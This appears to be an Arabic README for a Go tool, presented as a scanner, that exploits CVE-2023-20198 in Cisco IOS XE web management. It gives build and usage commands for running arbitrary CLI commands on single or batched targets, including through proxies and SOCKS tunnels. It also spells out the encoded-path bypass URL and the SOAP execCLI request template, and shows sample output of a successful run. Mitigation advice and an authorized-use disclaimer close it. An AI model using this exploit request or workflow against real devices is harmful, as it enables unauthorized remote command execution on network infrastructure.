
ماسح ثغرات مبني على Go لاكتشاف CVE-2023-20198 في أجهزة Cisco IOS XE. يختبر واجهات SOAP/XML (WSMA) لتنفيذ تعليمات برمجية عن بُعد مع فحص دفعات وإنشاء تقارير HTML.
ماسح ضوئي احترافي للثغرات الأمنية لكشف CVE-2023-20198 في أجهزة Cisco IOS XE. يختبر واجهات SOAP/XML الضعيفة (WSMA). صُمم لتقييمات الأمان المصرح بها وتدقيق الشبكات.
لاختبار الأمان المصرح به فقط
هذه الأداة مخصصة حصريًا لما يلي:
الوصول غير المصرح به إلى أنظمة الحاسوب غير قانوني. تأكد دائمًا من حصولك على التصريح المناسب قبل اختبار أي أنظمة.
go installgo install github.com/gustavorobertux/cisco-cve-2023-20198-checker@latest
سيتم تثبيت الملف الثنائي في دليل $GOPATH/bin (عادةً ~/go/bin).
# استنساخ المستودع
git clone https://github.com/gustavorobertux/cisco-cve-2023-20198-checker.git
cd cisco-cve-2023-20198-checker
# بناء
go build -o cisco-cve-2023-20198-checker
# تثبيت (اختياري)
sudo mv cisco-cve-2023-20198-checker /usr/local/bin/
# فحص هدف واحد
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin123
# فحص أهداف متعددة
cisco-cve-2023-20198-checker -targets-file targets.txt -password admin
# إنشاء تقرير HTML
cisco-cve-2023-20198-checker -target 10.0.0.1 -password secret -html
ممتاز للبيئات المؤسسية! يدعم:
# وكيل HTTP
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
-proxy http://proxy.company.com:8080
# SOCKS5 (نفق SSH)
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin \
-proxy socks5://127.0.0.1:1080
# متغير بيئة
export HTTPS_PROXY=http://proxy.company.com:8080
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin
انظر PROXY_GUIDE.md للحصول على تفاصيل تكوين الوكيل.
| العلامة | النوع | الافتراضي | الوصف |
|---|---|---|---|
-target | string | - | IP/اسم مضيف الهدف الفردي |
-targets-file | string | - | ملف يحتوي على الأهداف (واحد لكل سطر) |
-port | int | 443 | منفذ HTTPS/SOAP |
-username | string | admin | اسم مستخدم SOAP |
-password | string | - | مطلوب. كلمة مرور SOAP |
-command | string | uname -a | الأمر المراد تنفيذه |
-html | bool | false | إنشاء تقرير HTML |
-timeout | int | 10 | مهلة الطلب (بالثواني) |
-skip-verify | bool | true | تخطي التحقق من SSL |
-proxy | string | - | رابط الوكيل (http://، https://، socks5://) |
# فحص الثغرة الأساسي
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin123
# منفذ مخصص
cisco-cve-2023-20198-checker -target 10.0.0.1 -port 8443 -password secret
# تنفيذ أمر محدد
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
-command "show version"
# إنشاء تقرير
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin -html
# إنشاء ملف الأهداف
cat > targets.txt << EOF
192.168.1.100
10.0.0.1
172.16.0.50
EOF
# اختبار جميع الأهداف
cisco-cve-2023-20198-checker -targets-file targets.txt -password admin123
# دفعة مع تقرير HTML
cisco-cve-2023-20198-checker -targets-file devices.txt -password admin -html
# تعداد الشبكة
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
-command "show ip interface brief"
# كشف الإصدار
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
-command "show version"
# عبر وكيل HTTP
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
-proxy http://proxy.company.com:8080
# عبر وكيل SOCKS5 (نفق SSH)
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin \
-proxy socks5://127.0.0.1:1080
# وكيل موثق
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
-proxy http://user:[email protected]:8080
معرف CVE: CVE-2023-20198
درجة CVSS: 10.0 (حرجة)
النوع: تنفيذ أكواد عن بُعد (RCE)
المتأثر: واجهة Web UI من Cisco IOS XE (WSMA)
/%2577ebui_wsma_https (تجاوز ترميز المسار)urn:cisco:wsma-exec<SOAP:Envelope xmlns:SOAP="http://schemas.xmlsoap.org/soap/envelope/">
<SOAP:Header>
<wsse:Security xmlns:wsse="http://schemas.xmlsoap.org/ws/2002/04/secext">
<wsse:UsernameToken>
<wsse:Username>admin</wsse:Username>
<wsse:Password>password</wsse:Password>
</wsse:UsernameToken>
</wsse:Security>
</SOAP:Header>
<SOAP:Body>
<request xmlns="urn:cisco:wsma-exec">
<execCLI>
<cmd>COMMAND_HERE</cmd>
</execCLI>
</request>
</SOAP:Body>
</SOAP:Envelope>
إذا كانت أجهزتك معرضة للخطر:
1. تعطيل WSMA (إن لم يكن مطلوبًا)
no ip http server
no ip http secure-server
2. تقييد الوصول باستخدام قوائم التحكم بالوصول (ACLs)
ip http access-class MGMT-ONLY
ip access-list standard MGMT-ONLY
permit 10.0.0.0 0.0.0.255
deny any log
3. تحديث البرامج الثابتة - تطبيق أحدث تصحيحات الأمان من Cisco
4. تفعيل المصادقة القوية
aaa new-model
aaa authentication login default group tacacs+ local
5. مراقبة السجلات - مراقبة النشاط المشبوه لـ SOAP/HTTP
# بناء قياسي
go build -o cisco-cve-2023-20198-checker
# مُحسّن (ملف ثنائي أصغر)
go build -ldflags="-s -w" -o cisco-cve-2023-20198-checker
# ترجمة متقاطعة لمنصات مختلفة
GOOS=linux GOARCH=amd64 go build -o cisco-cve-2023-20198-checker-linux
GOOS=windows GOARCH=amd64 go build -o cisco-cve-2023-20198-checker.exe
GOOS=darwin GOARCH=arm64 go build -o cisco-cve-2023-20198-checker-mac-m1
╔═══════════════════════════════════════════════════════════╗
║ فحص أمان SOAP/XML من Cisco ║
║ تقييم أمان تعليمي ومصرح به فقط ║
╚═══════════════════════════════════════════════════════════╝
[*] الأمر: show version
[*] المنفذ: 443
[*] المهلة: 10 ثوانٍ
[1/1] اختبار الهدف: 192.168.1.100:443
[*] جاري إرسال طلب SOAP...
[+] تم تلقي الرد (الحالة: 200)
[+] نجاح!
╔═══════════════════════════════════════════════════════════╗
║ نتائج الدفعة ║
╚═══════════════════════════════════════════════════════════╝
[✓] 192.168.1.100:443 - نجاح
Cisco IOS XE Software, الإصدار 16.09.04...
╔═══════════════════════════════════════════════════════════╗
║ الملخص ║
╚═══════════════════════════════════════════════════════════╝
إجمالي الأهداف: 1
ناجحة: 1
فاشلة: 0
تقرير تقييم أمان احترافي مع:
المساهمات مرحب بها! يرجى:
رخصة MIT - انظر ملف LICENSE
هذه الأداة مخصصة فقط لفحص الثغرات المصرح به. المؤلفون غير مسؤولين عن سوء الاستخدام. احصل دائمًا على إذن كتابي قبل اختبار أنظمة لا تملكها.
صُنع من أجل مجتمع الأمان 🛡️